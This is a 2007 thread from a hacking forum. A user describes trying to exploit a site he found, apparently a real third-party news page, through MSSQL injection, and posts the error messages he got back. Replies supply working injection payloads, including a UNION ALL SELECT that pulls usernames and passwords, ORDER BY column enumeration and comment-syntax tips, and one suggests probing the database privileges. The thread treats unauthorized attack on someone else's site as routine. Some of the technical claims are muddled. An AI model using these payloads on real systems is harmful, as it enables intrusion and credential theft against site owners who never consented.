Donate to us via Paypal!
I'd prefer to die standing, than to live on my knees - Che Guevara
Tuesday, October 27, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 111
Guests Online: 109
Members Online: 2

Registered Members: 129433
Newest Member: jessievd69
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

mssql injections :-/


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-05-07 04:14
For the past 2 hours I've been trying to exploit a page I found that I think is vulnerable to sql injection. After reading countless articles and pdf's I'm left confused.the url looks like this:

newfullstory.asp?ID=

when I put this query in the url:

newfullstory.asp?ID="or'='--

I get the following error:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'or=--' to a column of data type int.

/news/lani/newfullstory.asp, line 357

I read an article http://www.securiteam.com/securityreviews/5DP0N1P76E.html

and it said if you get that error and you put this query in the url:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

and this should output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/index.asp, line 5


but when I do it all I get is this:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '114124 SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-' to a column of data type int.

/news/lani/newfullstory.asp, line 357

So I'm out of ideas and I'm going to continue searching, but if anyone has any idea of what is going on and could reply, I'd appreciate it very much.

- A~hack







Edited by on 11-05-07 04:15
Author

RE: mssql injections :-/


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-05-07 04:24

For starters i believe the m$ dbase wants /* for comments instead of -- (tho i could be wrong. give it a try tho)

it looks to me like you put 2 ' in that first example. try just puting 1 to close it then the OR portion.

2ndly this is a BLIND sql injection, which has different rules. so reading sql injection tuts will only semi help you. you cannot do a specific select for these you have to do a
UNION ALL SELECT (all the fields) FROM table --
example:
UNION ALL SELECT username, password, uid FROM users --
if those were it...
you can find these by doing
newfullstory.asp?ID=4 ORDER BY 1/* (or -- if it is that)
that should work
if it does do
newfullstory.asp?ID=4 ORDER BY2/*
then 3, 4, 5, etc....till you throw an error


enjoy




Edited by on 11-05-07 04:26
Author

RE: mssql injections :-/


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 17-05-07 16:38
See if you can find what priveleges (or user) your running the sql queries under.